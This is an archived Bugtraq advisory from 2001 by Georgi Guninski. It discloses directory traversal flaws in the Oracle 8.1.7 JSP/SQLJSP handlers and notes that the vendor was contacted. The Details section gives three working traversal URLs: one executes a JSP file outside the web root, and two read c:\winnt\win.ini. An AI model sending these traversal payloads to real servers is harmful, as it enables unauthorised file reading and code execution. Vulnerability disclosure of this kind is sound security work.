Home page logo
/

bugtraq logo Bugtraq mailing list archives

Oracle JSP/SQLJSP handlers allow viewing files and executing JSP outside the web root
From: Georgi Guninski <guninski () GUNINSKI COM>
Date: Mon, 22 Jan 2001 17:35:55 +0200

Georgi Guninski security advisory #36, 2001

Oracle JSP/SQLJSP handlers allow viewing files and executing JSP outside the web root

Systems affected:
Oracle JSP/SQLJSP handlers, installed by default Oracle 8.1.7 Windows 2000
Have not tested on other versions but they may be vulnerable

Risk: High
Date: 22 January 2001

Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski. You may distribute it unmodified.
You may not modify it and distribute it or distribute parts of it without the author's
written permission.

Disclaimer:
The opinions expressed in this advisory and program are my own and not of any company.
The usual standard disclaimer applies, especially the fact that Georgi Guninski
is not liable for any damages caused by direct or  indirect use of the information
or functionality provided by this advisory or program.
Georgi Guninski bears no responsibility for content or misuse of this advisory or program or
any derivatives thereof.


Description:
It is possible to view files outside the web root.
Also possible is execution of .JSP files outside the web root in the same partiotion as
the web server's root.


Details:
I guess there are at least 2 vulnerabilities with JSP/SQLJSP handlers.
Basically these are directory traversal vulnerabilities.
1) The following URL:
---------------------------------------
http://oraclehost/servlet//..//../o.jsp
---------------------------------------
will execute c:\o.jsp if there is such file.
As a side effect this shall create the directory C:\servlet\_pages\_servlet and shall put
in it the java source and .class file of o.jsp

2) The following URL:
-------------------------------------------------------------
http://oraclehost/a.jsp//..//..//..//..//..//../winnt/win.ini
-------------------------------------------------------------
shall read c:\winnt\win.ini. It is normal to receive an error to this request. To see the result
go to: http://oraclehost/_pages and look in the directories for .java files containing "win"

3) The following URL:
-----------------------------------------------------------------
http://oraclehost/bb.sqljsp//..//..//..//..//..//../winnt/win.ini
-----------------------------------------------------------------
shall read c:\winnt\win.ini. It is normal to receive an error to this request. To see the result
go to: http://oraclehost/_pages and look in the directories for .java files containing "win"

Note: all urls were tested with Netscape 4.76 or direct HTTP requests. Do not work with IE.


Vendor status:
Oracle was contacted on 18 January 2001.

Regards,
Georgi Guninski
http://www.guninski.com


  By Date           By Thread  

Current thread:
  • Oracle JSP/SQLJSP handlers allow viewing files and executing JSP outside the web root Georgi Guninski (Jan 23)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]